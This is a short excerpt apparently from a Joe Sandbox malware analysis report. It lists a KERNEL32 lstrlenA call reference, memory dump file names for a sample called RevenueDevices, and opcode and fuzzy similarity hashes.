                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: lstrlen$CharNextlstrcmpi
                                          • String ID:
                                          • API String ID: 190613189-0
                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4